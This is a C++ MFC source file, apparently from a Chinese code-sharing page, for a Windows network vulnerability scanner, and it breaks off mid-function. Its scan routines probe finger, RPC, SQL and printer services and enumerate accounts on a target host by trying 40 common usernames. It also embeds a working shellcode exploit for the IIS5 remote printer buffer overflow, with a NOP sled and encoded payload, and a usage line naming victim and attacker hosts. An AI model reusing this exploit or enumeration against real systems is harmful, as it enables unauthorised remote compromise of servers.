📄 网络评估view.cpp
字号:
p->m_wndStatusBar.SetPaneText(2,str);
p->m_wndStatusBar.Invalidate();
}
pView->stopupdate();//停止动画
return 0;
}
UINT fingerScan(LPVOID lParam)
{
CMyView*pView=(CMyView*)lParam;
CString strlist;
BOOL m_winb=TRUE;
m_winb=FingerScan(pView->m_destIp,strlist,pView->m_stringFinger);
pView->AddString(strlist);
if(m_winb==TRUE)
pView->updatelist(pView->m_checkFingernum," FINGER",pView->bright);
else
pView->updatelist(pView->m_checkFingernum," FINGER",pView->bwrong);
CMainFrame*p=(CMainFrame*)AfxGetApp()->GetMainWnd();
CString str="";
if(m_winb==TRUE)
{
//pView->wrong++;
str.Format(" 当前扫描系统漏洞数: %d/%d",pView->wrong,pView->wrong);
p->m_wndStatusBar.SetPaneText(2,str);
p->m_wndStatusBar.Invalidate();
}
pView->stopupdate();//停止动画
return 0;
}
UINT rpcScan(LPVOID lParam)
{
CMyView*pView=(CMyView*)lParam;
CString strlist;
BOOL m_winb=TRUE;
m_winb=RpcScan(pView->m_destIp,strlist,pView->m_stringRPC);
pView->AddString(strlist);
if(m_winb==TRUE)
pView->updatelist(pView->m_checkRPCnum," RPC",pView->bright);
else
pView->updatelist(pView->m_checkRPCnum," RPC",pView->bwrong);
CMainFrame*p=(CMainFrame*)AfxGetApp()->GetMainWnd();
CString str="";
if(m_winb==TRUE)
{
//pView->wrong++;
str.Format(" 当前扫描系统漏洞数: %d/%d",pView->wrong,pView->wrong);
p->m_wndStatusBar.SetPaneText(2,str);
p->m_wndStatusBar.Invalidate();
}
pView->stopupdate();//停止动画
return 0;
}
UINT sql_saScan(LPVOID lParam)
{
CMyView*pView=(CMyView*)lParam;
CString strlist;
BOOL m_winb=TRUE;
m_winb=SQLScan(pView->m_destIp,strlist,pView->m_stringSQL);
pView->AddString(strlist);
if(m_winb==TRUE)
pView->updatelist(pView->m_checkSQLnum," SQL",pView->bright);
else
pView->updatelist(pView->m_checkSQLnum," SQL",pView->bwrong);
CMainFrame*p=(CMainFrame*)AfxGetApp()->GetMainWnd();
CString str="";
if(m_winb==TRUE)
{
//pView->wrong++;
str.Format(" 当前扫描系统漏洞数: %d/%d",pView->wrong,pView->wrong);
p->m_wndStatusBar.SetPaneText(2,str);
p->m_wndStatusBar.Invalidate();
POSITION pos;
pos=pView->m_stringSQL.GetHeadPosition();
if(pos!=NULL)
for(int i=0;i<pView->m_stringSQL.GetCount();i++)
{
pView->getwrongtype(pView->m_stringSQL.GetAt(pos));
pView->m_stringSQL.GetNext(pos);
}
}
pView->stopupdate();//停止动画
return 0;
}
UINT ntuserScan(LPVOID lParam)
{
int a;
CMyView*pView=(CMyView*)lParam;
//SOCKET sockfd;
//SOCKADDR_IN addr;
CString username[40]={"webmaster","master","www","web","sybase","oracle","informix",
"Abc123","sam_exec","+","oracle8","access","users","ftp",
"account","backup","owc","datebase","public","info",
"wais","news","bbs","adm","sync","john","sports","china","ADMINISTRATOR",
"GUEST","BACKUP","ROOT","ADMIN","USER","DEMO","TEST","SYSTEM","OPERATOR","OPER","LOCAL"};
UCHAR IPUSER_IP[100]="";
UCHAR IPUSER_USER[100]="";
sprintf((LPTSTR)IPUSER_IP,"\\\\%s",pView->m_destIp);
/*
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
{
(dlg->m_HistoryEdit).AppendString ("无法建立Socket\r\n");
return 0;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(rmt_host);
if(connect(sockfd,(struct sockaddr *) &addr, sizeof(addr))<0)
{
(dlg->m_HistoryEdit).AppendString ("目标没有开放SMTP服务...\r\n");
fEvent.SetEvent();
return 0;
}
*/
//memset(rbuff,0,1024);
pView->AddString("NT服务器的USER的SID:");
pView->AddString("尝试利用USER2SID命令获得目标机上存在的一些常见用户名:");
pView->AddString("开始调入用户名列表--------");
for(a=0;a<40;a++)
{
sprintf((LPTSTR)IPUSER_USER,"%s",username[a]);
user2sid(2,(LPTSTR)IPUSER_IP,(LPTSTR)IPUSER_USER,pView);
Sleep(1);
}//for(a=0;a<40;a++)
Sleep(1000);
fEvent.SetEvent();
pView->updatelist(pView->m_checkUsersnum," USERS",2);
return 0;
}
int user2sid(int argc,char *argv0,char *argv1,LPVOID lParam)
{
if(argc!=2)
{
return 0;
}
CMyView*pView=(CMyView*)lParam;
pView->AddString("测试用户名:");
pView->AddString(argv1);
UCHAR buffer1[2048];
UCHAR buffer2[2048];
UCHAR buffer4[2048];
UCHAR buffer3[4];
DWORD length = 900;
size_t sh=0;
LPCTSTR lpSystemName; // address of string for system name
LPCTSTR lpAccountName; // address of string for account name
if (argc == 2)
{
lpSystemName = NULL;
lpAccountName = argv1;
}
else
{
if (argv0[0]=='\\') ++sh;
if (argv0[1]=='\\') ++sh;
lpSystemName = argv0+sh;
lpAccountName = argv1;
}
PSID Sid = buffer1; // address of security identifier
LPDWORD cbSid = &length; // address of size sid
LPTSTR ReferencedDomainName = (LPTSTR)buffer2; // address of string for referenced domain
LPDWORD cbReferencedDomainName = &length; // address of size domain string
PSID_NAME_USE peUse = (PSID_NAME_USE)buffer3; // address of structure for SID type
CString V_str1;
CString V_str2;
char *Tmp_str="";
if (LookupAccountName(lpSystemName, lpAccountName, Sid, cbSid,
ReferencedDomainName, cbReferencedDomainName,
peUse))
{
PSID_IDENTIFIER_AUTHORITY t = GetSidIdentifierAuthority(Sid);
//cout << endl << "S-1-";
if (t->Value[0] == 0 && t->Value[1] == 0)
{
V_str1.Format("S-1-%d%d%d%d",(ULONG)(t->Value[5] ),(ULONG)(t->Value[4] << 8),(ULONG)(t->Value[3] << 16),(ULONG)(t->Value[2] << 24));
/*
cout << (ULONG)(t->Value[5] ) +
(ULONG)(t->Value[4] << 8) +
(ULONG)(t->Value[3] << 16) +
(ULONG)(t->Value[2] << 24);
*/
}
else
{
V_str1.Format("S-1-%x%x%x%x%x%x",(USHORT)t->Value[0],(USHORT)t->Value[1],(USHORT)t->Value[2],(USHORT)t->Value[3],(USHORT)t->Value[4],(USHORT)t->Value[5]);
/*
cout << hex << (USHORT)t->Value[0]
<< (USHORT)t->Value[1]
<< (USHORT)t->Value[2]
<< (USHORT)t->Value[3]
<< (USHORT)t->Value[4]
<< (USHORT)t->Value[5]
<< dec;
*/
}
int n = *GetSidSubAuthorityCount(Sid);
for (int i = 0; i < n; ++i)
{
V_str2.Format("-%d",*GetSidSubAuthority(Sid, i) );
strcat(Tmp_str,V_str2);
//cout << '-' << *GetSidSubAuthority(Sid, i);
//cout << endl << endl;
}
V_str1=Tmp_str;
CString str1,str2,str3,str4;
str1.Format("Number of subauthorities is %s", V_str1);
//cout << "Number of subauthorities is " << n << endl;
CharToOem((LPTSTR)buffer2,(LPTSTR)buffer4);
str2.Format("Domain is %s",buffer4);
//cout << "Domain is " << buffer4 << endl;
str3.Format("Length of SID in memory is %d bytes",GetLengthSid(Sid));
//cout << "Length of SID in memory is " << GetLengthSid(Sid) << " bytes" << endl;
//cout << "Type of SID is ";
switch (*peUse)
{
case SidTypeUser:
str4="Type of SID is SidTypeUser";
//cout << "SidTypeUser" << endl;
break;
case SidTypeGroup:
str4="Type of SID is SidTypeGroup";
//cout << "SidTypeGroup" << endl;
break;
case SidTypeDomain:
str4="Type of SID is SidTypeDomain";
//cout << "SidTypeDomain" << endl;
break;
case SidTypeAlias:
str4="Type of SID is SidTypeAlias";
//cout << "SidTypeAlias" << endl;
break;
case SidTypeWellKnownGroup:
str4="Type of SID is SidTypeWellKnownGroup";
//cout << "SidTypeWellKnownGroup" << endl;
break;
case SidTypeDeletedAccount:
str4="Type of SID is SidTypeDeletedAccount";
//cout << "SidTypeDeletedAccount" << endl;
break;
case SidTypeInvalid:
str4="Type of SID is SidTypeInvalid";
//cout << "SidTypeInvalid" << endl;
break;
default:
str4="Type of SID is SidTypeUnknown";
//cout << "SidTypeUnknown" << endl;
}
pView->AddString(str1);
pView->AddString(str2);
pView->AddString(str3);
pView->AddString(str4);
}
else
pView->AddString("LookupAccountName failed - no such account") ;
return 0;
}
UINT printerScan(LPVOID lParam)
{
CMyView*pView=(CMyView*)lParam;
CString strlist;
BOOL m_winb=TRUE;
m_winb=PrinterScan(pView->m_destIp,strlist,pView->m_stringPrinter);
pView->AddString(strlist);
if(m_winb==TRUE)
pView->updatelist(pView->m_checkPrinternum," PRINTER",pView->bright);
else
pView->updatelist(pView->m_checkPrinternum," PRINTER",pView->bwrong);
CMainFrame*p=(CMainFrame*)AfxGetApp()->GetMainWnd();
CString str="";
if(m_winb==TRUE)
{
//pView->wrong++;
str.Format(" 当前扫描系统漏洞数: %d/%d",pView->wrong,pView->wrong);
p->m_wndStatusBar.SetPaneText(2,str);
p->m_wndStatusBar.Invalidate();
POSITION pos;
pos=pView->m_stringPrinter.GetHeadPosition();
if(pos!=NULL)
for(int i=0;i<pView->m_stringPrinter.GetCount();i++)
{
pView->getwrongtype(pView->m_stringPrinter.GetAt(pos));
pView->m_stringPrinter.GetNext(pos);
}
}
pView->stopupdate();//停止动画
return 0;
}
int printer_main(int argc, char argv[][100],LPVOID lParam){
CMyView*pView=(CMyView*)lParam;
pView->AddString("远程打印漏洞...");
/* the whole request rolled into one, pretty huh? carez. */
char sploit[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
int s;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;
#ifdef WIN32
WSADATA WSAData;
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) {
pView->AddString("WSAStartup failed.");
WSACleanup();
return 0;
}
#endif
pView->AddString("iis5 remote printer overflow.");
pView->m_stringPrinter.AddTail("iis5 打印机溢出");
if (argc != 5) {
//printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
return 0;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -